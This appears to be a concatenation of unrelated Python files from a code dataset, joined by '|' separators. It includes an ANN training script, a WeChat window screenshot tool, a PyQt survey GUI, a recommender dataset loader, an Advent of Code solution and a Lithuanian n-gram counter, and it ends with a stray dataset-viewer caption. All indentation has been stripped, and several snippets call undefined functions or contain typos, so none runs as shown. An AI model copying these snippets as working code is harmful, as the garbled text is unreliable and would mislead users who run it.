def caculate_cor():
global r_test,r_train,y_test_pred,y_train_pred,rmse_test,rmse_train
y_test_pred=pd.DataFrame(model.predict(x_test).reshape(y_test.shape),index=test_index)
r_test=np.corrcoef(y_test_pred[0],y_test[colnames[0]])
y_train_pred=pd.DataFrame(model.predict(x_train).reshape(y_train.shape),index=train_index)
r_train=np.corrcoef(y_train_pred[0],y_train[colnames[0]])
rmse_test=rmse(y_test[colnames[0]],y_test_pred[0])
rmse_train=rmse(y_train[colnames[0]],y_train_pred[0])
#################################################################################################3
frame=pd.read_excel('ANN.xlsx',sheet_name=1)
#dummies_method=pd.get_dummies(frame['Method'],columns='Method')#
x_data=frame.iloc[:,:31]
y_data=frame.iloc[:,31:]
x_train,x_test,y_train,y_test=train_test_split(x_data,y_data,test_size=0.2,random_state=1234)
x_train,x_val,y_train,y_val=train_test_split(x_train,y_train,test_size=0.25,random_state=1234)
colnames=y_data.columns.values.tolist()
#xdata[['Carbon','Macromolecular Compound','Com-1','Com-2','Oxide','Salt','Dim','Hollow','Zeta Potential (mV)']]= xdata['Carbon'].apply(pd.to_numeric)#
file1='predict.xlsx'
wb1=xlrd.open_workbook(filename=file1)
ws1=wb1.sheet_by_name('Sheet1')
predictdata=[]
for i in range(ws1.nrows):
col=[]
for j in range(ws1.ncols):
col.append(ws1.cell(i,j).value)
predictdata.append(col)
predf=pd.DataFrame(predictdata[1:],columns=predictdata[0],dtype='float64')
ss=ShuffleSplit(n_splits=10, test_size=0.1,random_state=0)
kf=KFold(n_splits=10,shuffle=False)
prelist=[]
corlist_train=[]
corlist_test=[]
rmsel_train=[]
rmsel_test=[]
o=[]
with tqdm(total=10) as pbar:
for train_index , test_index in ss.split(x_data,y_data):
global x_train,y_train,x_test,y_test
x_train=x_data.iloc[train_index,:]
y_train=y_data.iloc[train_index,:]
x_test=x_data.iloc[test_index,:]
y_test=y_data.iloc[test_index,:]
Set_network(57,28)
Network_train('sgd',0.1,0.9,0.0001,2000)
#pre=model.predict(predf)
#prelist.append(pre.T)
caculate_cor()
corlist_train.append(r_train[1,0])
corlist_test.append(r_test[1,0])
rmsel_train.append(rmse_train)
rmsel_test.append(rmse_test)
scatter_loss_plot()
o.append(y_train[colnames[0]])
o.append(y_train_pred[0])
o.append(y_test[colnames[0]])
o.append(y_test_pred[0])
pbar.update(1)
presult=pd.DataFrame(np.array(prelist).reshape(10,5),columns=['T','C','S','M','L'])
cordf=pd.DataFrame({'tarin':corlist_train,'test':corlist_test})
rmsedf=pd.DataFrame({'rmse_train':rmsel_train,'rmse_test':rmsel_test})
obs_pre_df=pd.DataFrame([y_data[colnames[0]],o[1],o[5],o[9],o[13],o[17],o[21],o[25],o[29],o[33],o[37],
o[3],o[7],o[11],o[15],o[19],o[23],o[27],o[31],o[35],o[39]]).T
obs_pre_df.columns=(colnames[0],'train1','train2','train3','train4','train5',
'train6','train7','train8','train9','train10',
'test1','test2','test3','test4','test5',
'test6','test7','test8','test9','test10')
writer=pd.ExcelWriter('anti-relu.xlsx')
write_result(3)
writer.save()
weight=model.get_weights()
model.save('anti-relu-model.h5')
model.save_weights("anti-relu-weights.h5")
writer1=pd.ExcelWriter('ann-op.xlsx')
writer2=pd.ExcelWriter('ann-cor.xlsx')
for i in trange(1,13):
frame=pd.read_excel('ANN.xlsx',sheet_name=i)
x_data=frame.iloc[:,0:31]
y_data=frame.iloc[:,31:]
x_names=x_data.columns.values.tolist()
colnames=y_data.columns.values.tolist()
ss=ShuffleSplit(n_splits=10, test_size=0.1,random_state=0)
stdsc=StandardScaler()
x_data=pd.DataFrame(stdsc.fit_transform(x_data))
x_data.columns=x_names
prelist=[]
corlist_train=[]
corlist_test=[]
o=[]
with tqdm(total=10) as pbar:
for train_index , test_index in ss.split(x_data,y_data):
global x_train,y_train,x_test,y_test
x_train=x_data.iloc[train_index,:]
#x_train=pd.DataFrame(stdsc.fit_transform(x_train))
#x_train.columns=x_names
y_train=y_data.iloc[train_index,:]
x_test=x_data.iloc[test_index,:]
#x_test=pd.DataFrame(stdsc.fit_transform(x_test))
#x_test.columns=x_names
y_test=y_data.iloc[test_index,:]
Set_network(62,31)
Network_train('Adam',0.1,0.9,0,200)
caculate_cor()
corlist_train.append(r_train[1,0])
corlist_test.append(r_test[1,0])
#scatter_loss_plot()
o.append(y_train[colnames[0]])
o.append(y_train_pred[0])
o.append(y_test[colnames[0]])
o.append(y_test_pred[0])
pbar.update(1)
cordf=pd.DataFrame({'tarin':corlist_train,'test':corlist_test})
obs_pre_df=pd.DataFrame([y_data[colnames[0]],o[1],o[5],o[9],o[13],o[17],o[21],o[25],o[29],o[33],o[37],
o[3],o[7],o[11],o[15],o[19],o[23],o[27],o[31],o[35],o[39]]).T
obs_pre_df.columns=(colnames[0],'train1','train2','train3','train4','train5',
'train6','train7','train8','train9','train10',
'test1','test2','test3','test4','test5',
'test6','test7','test8','test9','test10')
obs_pre_df.to_excel(writer1,sheet_name=colnames[0])
cordf.to_excel(writer2,sheet_name=colnames[0])
writer1.save()
writer2.save() |
#!/usr/bin/python
# -*- coding=utf-8 -*-
# 截图ScreenShot.py
import ctypes
import win32gui
from PIL import ImageGrab
import win32con
from ctypes import wintypes
import ctypes,os,time
def screenShot():
# 获取窗口句柄
hwnd = win32gui.FindWindow("WeChatMainWndForPC", "微信") #此处针对特定程序进行修改
if not hwnd:
print('window not found!')
else:
print(hwnd)
# 获取特定程序位置信息
def get_window_rect(hwnd):
try:
f = ctypes.windll.dwmapi.DwmGetWindowAttribute
except WindowsError:
f = None
if f:
rect = ctypes.wintypes.RECT()
DWMWA_EXTENDED_FRAME_BOUNDS = 9
f(ctypes.wintypes.HWND(hwnd),
ctypes.wintypes.DWORD(DWMWA_EXTENDED_FRAME_BOUNDS),
ctypes.byref(rect),
ctypes.sizeof(rect)
)
return rect.left, rect.top, rect.right, rect.bottom
# win32gui.ShowWindow(hwnd, win32con.SW_RESTORE) # 强行显示界面后才好截图
win32gui.SetForegroundWindow(hwnd) # 强制将窗口提到最前
# 裁剪得到全图
game_rect = get_window_rect(hwnd)
src_image = ImageGrab.grab(game_rect)
# src_image = ImageGrab.grab((game_rect[0] + 9, game_rect[1] + 190, game_rect[2] - 9, game_rect[1] + 190 + 450))
localtime = time.strftime("%Y%m%d%H%M%S", time.localtime()) # 时间戳
src_image_path = ('PrtSrc' + localtime + '.jpg')
print(src_image_path)
src_image.save("./img/"+'PrtSrc' + localtime + '.jpg')
print("截图时间:" + localtime)
#src_image.show();
return src_image_path;
if __name__=='__main__':
screenShot();
|
a=int(input('Prima varsta'))
b=int(input('A doua varsta'))
c=int(input('A treia varsta'))
if(a>=18) and (a<=60):
print(a)
if(b>=18) and (b<=60):
print(b)
if(c>=18) and (c<=60):
print(c) |
from PyQt5.QtWidgets import QMainWindow, QFileDialog
from GUI.ui_SurveyMod import ui_SurveyMod
from SurveyMod import SurveyMod
import json
class GUISurveyMod(QMainWindow):
log = None
survey = None
def __init__(self):
super().__init__()
self.ui = ui_SurveyMod()
self.ui.setupUi(self)
self.ui.runButton.clicked.connect(self.run)
self.ui.siteConfigButton.clicked.connect(self.chooseSiteConfig)
self.ui.helperConfigButton.clicked.connect(self.chooseHelpConfig)
def run(self):
siteConfig = self.ui.siteConfigLine.text()
helperConfig = self.ui.helperConfigLine.text()
iterations = self.ui.iterationsConfigLine.value()
if not siteConfig or not helperConfig or iterations <= 0:
return
with open(siteConfig) as site_config_file:
site_config = json.load(site_config_file)
with open(helperConfig) as helper_file:
helper = json.load(helper_file)
self.survey = SurveyMod(site_config, helper, None)
self.survey.notificator = self.checkLog
self.survey.run(iterations)
def chooseSiteConfig(self):
options = QFileDialog.Options()
options |= QFileDialog.DontUseNativeDialog
fileName, _ = QFileDialog.getOpenFileName(self, "Site Config ", "", "JSON Files (*.json)", options=options)
if fileName:
self.ui.siteConfigLine.setText(fileName)
def chooseHelpConfig(self):
options = QFileDialog.Options()
options |= QFileDialog.DontUseNativeDialog
fileName, _ = QFileDialog.getOpenFileName(self, "Helper Config ", "", "JSON Files (*.json)", options=options)
if fileName:
self.ui.helperConfigLine.setText(fileName)
def checkLog(self):
if self.log:
self.ui.log.setPlainText(self.log.getvalue())
if self.survey:
self.ui.mails.setHtml(self.survey.mailTexts)
|
import numpy as np
import random
import copy
class Dataset(object):
def __init__(self,inputfile):
self.user2transaction = {}
self.user2trainsaction_list = []
self.train_file = inputfile
self.item_sess_prices_files = "data/item_sess_price.tsv"
self.itemset = []
self.item2price = {}
self.item_encode = {}
self.init_paras()
self.basketnum = 8
self.batchsize = 5 #every batch need 5 users to train
def init_paras(self):
session_item2price = {}
file = open(self.item_sess_prices_files,'r')
lines = file.readlines()
file.close()
item_encode = 0
for line in lines:
line = line.strip()
line_list = line.split('\t')
itemid = int(line_list[0])
price = float(line_list[2])
if itemid not in self.item_encode.keys():
self.itemset.append(item_encode)
self.item2price[item_encode] = [price]
self.item_encode[itemid] = item_encode
item_encode += 1
else:
self.item2price[self.item_encode[itemid]].append(price)
session_item2price[(int (self.item_encode[itemid]), int (line_list[1]))] = float (line_list[2])
for key in self.item2price.keys():
self.item2price[key] = np.mean(self.item2price[key])
#print(session_item2price)
self.itemnum = len(self.itemset)
file = open(self.train_file,'r')
lines = file.readlines()
file.close()
for line in lines:
line = line.strip()
line_list = line.split('\t')
userid = int(line_list[0])
itemid = int(line_list[1])
itemid = self.item_encode[itemid]
sessionid = int(line_list[2])
score = float(line_list[3])
price = session_item2price[(itemid,sessionid)]
if userid not in self.user2transaction.keys():
self.user2transaction[userid] = {}
self.user2transaction[userid][sessionid] = [[itemid,price]]
else:
if sessionid not in self.user2transaction[userid]:
self.user2transaction[userid][sessionid] = [[itemid, price]]
else:
self.user2transaction[userid][sessionid].append([itemid, price])
#ingore the sessionid
sorted(self.user2transaction)#according userid sort
for key in self.user2transaction.keys():
self.user2trainsaction_list.append([])
for i in self.user2transaction[key].keys():
self.user2trainsaction_list[key-1].append(self.user2transaction[key][i])
# print(self.user2trainsaction_list[0][0])
# exit(0)
self.user2trainsaction_list = np.array(self.user2trainsaction_list)
self.usernum = len(self.user2trainsaction_list)
#print(self.user2trainsaction_list)
#[userid,target_item,price,[now_basket],[itemset]]
def get_traindataset(self):
users_list = list(range(250))
random.shuffle(users_list) #make the users_list unorder
users_list = np.array(users_list)
#print(self.user2trainsaction_list[0][0])
return_list = []
label_list = []
for user in users_list:
#print(user)
for index,trip in enumerate(self.user2trainsaction_list[user]):
now_basket = []
for items in trip:
target_item = items[0]
price = items[1]
basket = self.make_basket(now_basket,target_item)
return_list.append([user,target_item,price,now_basket,basket])
label_list.append(1.0)
#make neg_samples:
for neg_sample in basket:
if neg_sample not in now_basket and neg_sample != target_item:
return_list.append([user,neg_sample,self.item2price[neg_sample],now_basket,basket])
label_list.append(0.0)
#print(len(return_list))
return return_list,label_list
def make_basket(self,now_basket,target_item):
#item = self.itemnum
basket = copy.copy(now_basket)
basket.append(target_item)
#print(basket)
for i in range(self.basketnum-len(basket)):
#print(i)
j = np.random.randint(0,self.itemnum)
while j in basket:
j = np.random.randint (0, self.itemnum)
basket.append(j)
return basket
# test_dataset = Dataset("data/train.tsv")
# #print(len(test_dataset.get_traindataset()))
# test_dataset.get_traindataset() |
from utils import (
get_guard_periods,
lines_to_records,
read_input
)
def get_most_asleep_guard_on_same_minute(guard_periods):
return sorted(
[guard_id for guard_id in guard_periods.keys()],
key=lambda guard_id: max(guard_periods[guard_id])
)[-1]
if __name__ == '__main__':
records = lines_to_records(read_input())
guard_periods = get_guard_periods(records)
most_asleep_guard_on_same_minute = get_most_asleep_guard_on_same_minute(
guard_periods
)
minute = guard_periods[most_asleep_guard_on_same_minute].index(
max(guard_periods[most_asleep_guard_on_same_minute])
)
print(most_asleep_guard_on_same_minute * minute)
|
from collections import Counter
from pathlib import Path
raw_dir = Path(__file__).parent
allowed_chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZĄČĘĖĮŠŲŪŽ"
count = 0
letters = Counter()
_2gram = Counter()
_3gram = Counter()
for line in open('/Users/paulius/Temp/trash/lt_text'):
count += 1
if not count % 1000:
print(count)
for word in line.split():
sofar = '…'
for letter in word.upper():
if letter not in allowed_chars:
sofar = ''
continue
letters[letter] += 1
sofar += letter
if len(sofar) > 1:
_2gram[sofar[-2:]] += 1
if len(sofar) > 2:
_3gram[sofar[-3:]] += 1
sofar += '…'
if len(sofar) > 1:
_2gram[sofar[-2:]] += 1
if len(sofar) > 2:
_3gram[sofar[-3:]] += 1
with open(raw_dir / "1grams.txt", "w") as out:
total = sum(letters.values())
for gram, count in letters.most_common():
out.write(gram + ' ' + str(count / total) + '\n')
with open(raw_dir / "2grams.txt", "w") as out:
total = sum(_2gram.values())
for gram, count in _2gram.most_common():
out.write(gram + ' ' + str(count / total) + '\n')
with open(raw_dir / "3grams.txt", "w") as out:
total = sum(_3gram.values())
for gram, count in _3gram.most_common():
out.write(gram + ' ' + str(count / total) + '\n')
if __name__ == '__main__':
pass |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.